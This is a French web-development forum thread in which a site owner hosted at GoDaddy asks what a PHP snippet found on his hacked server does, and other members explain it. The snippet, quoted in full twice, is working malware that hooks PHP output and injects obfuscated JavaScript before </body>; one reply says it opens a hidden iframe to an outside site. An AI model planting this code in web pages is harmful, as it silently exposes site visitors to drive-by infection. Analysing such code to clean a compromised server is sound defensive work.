Aller au contenu

Change
Bienvenue sur GeekZone
Inscrivez-vous sur GeekZone pour profiter des fonctions avancées du forum, proposer des news, participer aux conversations, ouvrir votre galerie, profiter de la messagerie interne et venir tester nos modérateurs avec du bon troll... Attention, ils ont la gâchette facile. C’est aussi pour ça que GeekZone est le meilleur site de passionnés depuis 2002 ! Si vous avez déjà un compte, connectez-vous - sinon, il est temps d'en créer un.

Serveur hacké

- - - - -
Débuté par olivarius , 28 May 2011 08:31

  • Veuillez vous connecter pour répondre
8 réponses à ce sujet

#1
olivarius
Posté 28 May 2011 - 08:31

olivarius

    Yoda Geek

  • Membre
  • PipPipPipPipPipPip
  • 2931 messages
Bonjour,

J'ai un serveur chez GoDaddy et je n'arrête pas d'être hacké.
Est ce que vous savez ce que peux faire ce code ?

<?php
//{{2367093f

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
  $links = '<script id="x74dae84aa67843a09b80031fb">var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="AC6tl( h8/<saeT{?'Nofb;3gu=B0m1>E 7p\"4:wi)}[ny.cvr,]d9";ar2="R24,0,136,-80,52,-112,188,-132,112,-88,16,-64,124,-164,172,-88,-44,-40,116,-112,36,64,-64,124,-164,32,64,72,-124,-8,48,-24,-24,68,-64,-32,48,16,-8,132,-28,-112,96,8,-60,92,-40,-104,-36,0,0,136,-80,116,-148,68,-64,144,-176,144,-76,-64,0,144,-36,-80,-36,28,8,80,-72,-36,0,0,184,-132,112,-88,16,-64,124,-164,172,-28,40,-36,-148,40,-32,124,-104,120,-80,116,-148,68,-64,80,-88,152,-8,-84,-36,-40,-16,0,128,12,-116,0,8,-16,48,120,-184,16,24,132,4,-112,40,-80,28,16,-68,128,20,48,-104,44,60,-160,4,-20,116,-100,0,-40,128,-104,116,-56,-44,64,100,-128,-52,80,0,-20,28,-40,4,-16,64,24,4,48,-196,16,76,-36,52,-8,-44,64,-104,24,108,-64,-68,-16,92,-36,52,-8,-44,64,-88,-32,168,-164,36,52,-36,124,-32,-116,116,-76,76,-144,144,-148,168,-28,-124,132,48,0,-156,124,-88,52,-64,-32,116,-148,148,-84,100,-24,-104,36,-40,32,-60,84,-88,40,36,-72,36,28,-68,140,-40,-24,-76,64,64,12,-40,-24,-20,56,-84,-4,124,-80,116,-148,68,-64,72,20,20,-76,-64,0,144,-144,0,56,20,76,12,-176,148,-84,100,-44,28,-80,116,-148,68,-64,144,-176,144,-104,-36,0,0,168,-144,148,-64,-52,52,-28,28,76,-132,112,-88,16,-64,124,-164,172,4,8,-144,-4,-36,40,76,-112,36,64,-64,124,-164,8,48,92,-80,116,-148,68,-64,16,96,-76,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,-24,152,-8,-120,132,-132,-40,-16,0,128,12,-116,0,8,-16,48,120,-184,16,24,132,4,-112,40,-80,28,16,-68,128,20,48,-104,44,60,-160,4,-20,116,-100,0,-40,128,-104,116,-56,-44,64,100,-128,-52,80,0,-20,28,-40,4,-16,96,-76,-8,104,-140,-32,168,-164,36,132,8,-32,-116,116,-76,76,-144,144,-148,168,-76,-36,-40,132,48,0,-156,124,-108,20,-8,104,-140,-32,168,-164,36,132,-44,-64,-32,116,-148,148,-84,100,-72,-36,-20,36,-40,32,-60,84,-88,40,16,20,-8,104,-140,-32,168,-164,36,132,-168,36,28,-68,92,-36,44,-44,20,-8,104,-140,-32,168,-164,36,132,-172,64,64,-36,-36,44,-44,20,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,88,4,48,-196,16,40,132,-132,52,-8,-44,96,-76,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,-40,24,108,-64,-68,-16,56,132,-132,52,-8,-44,96,-76,-64,0,0,184,-132,112,-88,16,-64,124,-164,172,-88,-44,-40,116,-112,36,64,-64,124,-164,32,64,72,-124,-8,48,-24,-24,68,-64,-32,48,16,-8,132,-28,-112,96,8,-60,92,-20,-136,92,0,-88,124,32,-204,24,132,-144,192,-188,60,84,-76,-64,0,144]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML="ReferenceErr";yes=true;},1);</script>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}

//}}581416b6
?>

Merci d'avance pour votre aide :flowers:
Image IPB

#2
sysmox
Posté 28 May 2011 - 22:15

sysmox

    Little Geek

  • Membre
  • Pip
  • 1 messages

Voir le messageolivarius, le 28 May 2011 - 08:31, dit :

Bonjour,

J'ai un serveur chez GoDaddy et je n'arrête pas d'être hacké.
Est ce que vous savez ce que peux faire ce code ?

<?php
//{{2367093f

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
  $links = '<script id="x74dae84aa67843a09b80031fb">var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="AC6tl( h8/<saeT{?'Nofb;3gu=B0m1>E 7p\"4:wi)}[ny.cvr,]d9";ar2="R24,0,136,-80,52,-112,188,-132,112,-88,16,-64,124,-164,172,-88,-44,-40,116,-112,36,64,-64,124,-164,32,64,72,-124,-8,48,-24,-24,68,-64,-32,48,16,-8,132,-28,-112,96,8,-60,92,-40,-104,-36,0,0,136,-80,116,-148,68,-64,144,-176,144,-76,-64,0,144,-36,-80,-36,28,8,80,-72,-36,0,0,184,-132,112,-88,16,-64,124,-164,172,-28,40,-36,-148,40,-32,124,-104,120,-80,116,-148,68,-64,80,-88,152,-8,-84,-36,-40,-16,0,128,12,-116,0,8,-16,48,120,-184,16,24,132,4,-112,40,-80,28,16,-68,128,20,48,-104,44,60,-160,4,-20,116,-100,0,-40,128,-104,116,-56,-44,64,100,-128,-52,80,0,-20,28,-40,4,-16,64,24,4,48,-196,16,76,-36,52,-8,-44,64,-104,24,108,-64,-68,-16,92,-36,52,-8,-44,64,-88,-32,168,-164,36,52,-36,124,-32,-116,116,-76,76,-144,144,-148,168,-28,-124,132,48,0,-156,124,-88,52,-64,-32,116,-148,148,-84,100,-24,-104,36,-40,32,-60,84,-88,40,36,-72,36,28,-68,140,-40,-24,-76,64,64,12,-40,-24,-20,56,-84,-4,124,-80,116,-148,68,-64,72,20,20,-76,-64,0,144,-144,0,56,20,76,12,-176,148,-84,100,-44,28,-80,116,-148,68,-64,144,-176,144,-104,-36,0,0,168,-144,148,-64,-52,52,-28,28,76,-132,112,-88,16,-64,124,-164,172,4,8,-144,-4,-36,40,76,-112,36,64,-64,124,-164,8,48,92,-80,116,-148,68,-64,16,96,-76,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,-24,152,-8,-120,132,-132,-40,-16,0,128,12,-116,0,8,-16,48,120,-184,16,24,132,4,-112,40,-80,28,16,-68,128,20,48,-104,44,60,-160,4,-20,116,-100,0,-40,128,-104,116,-56,-44,64,100,-128,-52,80,0,-20,28,-40,4,-16,96,-76,-8,104,-140,-32,168,-164,36,132,8,-32,-116,116,-76,76,-144,144,-148,168,-76,-36,-40,132,48,0,-156,124,-108,20,-8,104,-140,-32,168,-164,36,132,-44,-64,-32,116,-148,148,-84,100,-72,-36,-20,36,-40,32,-60,84,-88,40,16,20,-8,104,-140,-32,168,-164,36,132,-168,36,28,-68,92,-36,44,-44,20,-8,104,-140,-32,168,-164,36,132,-172,64,64,-36,-36,44,-44,20,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,88,4,48,-196,16,40,132,-132,52,-8,-44,96,-76,-8,104,-140,8,-40,-12,12,0,184,-36,-76,16,-88,40,-32,48,-40,24,108,-64,-68,-16,56,132,-132,52,-8,-44,96,-76,-64,0,0,184,-132,112,-88,16,-64,124,-164,172,-88,-44,-40,116,-112,36,64,-64,124,-164,32,64,72,-124,-8,48,-24,-24,68,-64,-32,48,16,-8,132,-28,-112,96,8,-60,92,-20,-136,92,0,-88,124,32,-204,24,132,-144,192,-188,60,84,-76,-64,0,144]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML="ReferenceErr";yes=true;},1);</script>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}

//}}581416b6
?>

Merci d'avance pour votre aide :flowers:


This is an exaploit code hackers inject it into vulnerable websites ; the code which allows attackers to remotely execute malicious code on end user PCs (tojan - virus -spam ....)

good luck

sysmox
info@sysmox.com

#3
Moe
Posté 28 May 2011 - 23:23

Moe

    Râleur

  • Membre
  • PipPipPipPipPipPip
  • 3124 messages
  • Lieu:France
Quelle est ta question ? Que veux-tu faire avec ce code malveillant ? Tu t'es fait hacké via une faille dans un programme ou on t'a volé ton mot de passe FTP ?

Si tu veux éviter que ça se reproduise, il y a un guide écrit à la base pour Dotclear mais qui peut quand même te servir : http://forum.dotclea...ic.php?id=40783
Image IPB Image IPBFranglaisZone :(

#4
Vandal
Posté 29 May 2011 - 10:08

Vandal

    Senseï Geek

  • Membre
  • PipPipPipPipPip
  • 1278 messages
Non, il ne veut rien faire avec ce code. Il cherche juste à comprendre ce qu'il fait, à quoi il s'expose, et il veut se protéger. De ce que j'ai compris.
Débutant 6 3 s !!!! - Intermédiaire 37 s 36s 27s 25s ! - Expert 105 s 103 s100 s94 s 91s new !!! 79s !!! 78s76s !
Image IPBImage IPB

#5
olivarius
Posté 30 May 2011 - 08:07

olivarius

    Yoda Geek

  • Membre
  • PipPipPipPipPipPip
  • 2931 messages

Voir le messageMoe, le 28 May 2011 - 23:23, dit :

Quelle est ta question ? Que veux-tu faire avec ce code malveillant ? Tu t'es fait hacké via une faille dans un programme ou on t'a volé ton mot de passe FTP ?

Si tu veux éviter que ça se reproduise, il y a un guide écrit à la base pour Dotclear mais qui peut quand même te servir : http://forum.dotclea...ic.php?id=40783
Je ne pense pas m'être fait voler mon mot de passe de mon ftp. Je pense plutôt que mon hébergeur Godaddy est une vraie passoire. C'est la deuxième fois que ça m'arrive.

Voir le messageVandal, le 29 May 2011 - 10:08, dit :

Non, il ne veut rien faire avec ce code. Il cherche juste à comprendre ce qu'il fait, à quoi il s'expose, et il veut se protéger. De ce que j'ai compris.
Exactement. Juste par curiosité je voulais savoir quels étaient les effets de ce code.

J'ai tout migré sur gandi. C'est plus rapide et plus sécurisé.
Image IPB

#6
PERECil
Posté 30 May 2011 - 08:37

PERECil

    Développeur de Magna Stella

  • Membre
  • PipPipPipPipPipPipPip
  • 4624 messages
  • Lieu:Strasbourg, France
Ce que ce code fait:

Il t'installe un output handler sur tes fichiers PHP (un truc qui va faire une post opération avant d'envoyer le rendu au navigateur) en replaçant tes liens href par une version vérolée. Par contre, j'ai pas débunké le code JS, il est obfusqué et honnêtement c'est chiant a dépiauter.

Check dans ta config php ou ton .htaccess si on t'as pas modifié l'option auto append file ou auto prepend file, parce que c'est le seul moyen que je vois pour inclure ce PHP automatiquement.

Référence des options de config PHP:
http://php.net/manual/en/ini.core.php
Blog: Moments choisis de culture Geek | Twitter | XNA Connection: Actus, tutoriels, et ressources sur XNA

#7
olivarius
Posté 30 May 2011 - 08:42

olivarius

    Yoda Geek

  • Membre
  • PipPipPipPipPipPip
  • 2931 messages

Voir le messagePERECil, le 30 May 2011 - 08:37, dit :

Ce que ce code fait:

Il t'installe un output handler sur tes fichiers PHP (un truc qui va faire une post opération avant d'envoyer le rendu au navigateur) en replaçant tes liens href par une version vérolée. Par contre, j'ai pas débunké le code JS, il est obfusqué et honnêtement c'est chiant a dépiauter.

Check dans ta config php ou ton .htaccess si on t'as pas modifié l'option auto append file ou auto prepend file, parce que c'est le seul moyen que je vois pour inclure ce PHP automatiquement.

Référence des options de config PHP:
http://php.net/manual/en/ini.core.php

Merci pour ces infos :flowers:

Je ne suis pas admin du serveur. Il est géré par goDaddy. Du coup je ne configure rien du php.
Pour le .htaccess je n'ai que ça :
Options +FollowSymlinks
RewriteEngine on
Et mes redirection.

Du coup c'est un hack de GoDaddy ou il faut que je cherche de mon côté ?
Image IPB

#8
PERECil
Posté 30 May 2011 - 10:06

PERECil

    Développeur de Magna Stella

  • Membre
  • PipPipPipPipPipPipPip
  • 4624 messages
  • Lieu:Strasbourg, France
Bon j'ai parlé un peu trop vite, les liens href sont pas en cause. Par contre le script JS s'ajoute en bas, avant le body, et crée une iframe invisible qui pointe sur l'url suivante:

http://shorthe.com/?...7843a09b80031fb

Je pense que c'est un hack GoDaddy, vu le peu d'options que tu peux avoir dans ce genre d'offres commerciales.

Modifié par PERECil, 30 May 2011 - 10:09.

Blog: Moments choisis de culture Geek | Twitter | XNA Connection: Actus, tutoriels, et ressources sur XNA

#9
olivarius
Posté 30 May 2011 - 11:48

olivarius

    Yoda Geek

  • Membre
  • PipPipPipPipPipPip
  • 2931 messages

Voir le messagePERECil, le 30 May 2011 - 10:06, dit :

Bon j'ai parlé un peu trop vite, les liens href sont pas en cause. Par contre le script JS s'ajoute en bas, avant le body, et crée une iframe invisible qui pointe sur l'url suivante:

http://shorthe.com/?...7843a09b80031fb

Je pense que c'est un hack GoDaddy, vu le peu d'options que tu peux avoir dans ce genre d'offres commerciales.

Merci pour ton aide.
Image IPB
Retourner dans Web Dev


0 utilisateur(s) li(sen)t ce sujet

0 membre(s), 0 invité(s), 0 utilisateur(s) anonyme(s)

  1. GeekZone
  2. DevZone
  3. Segmentation Fault
  4. Web Dev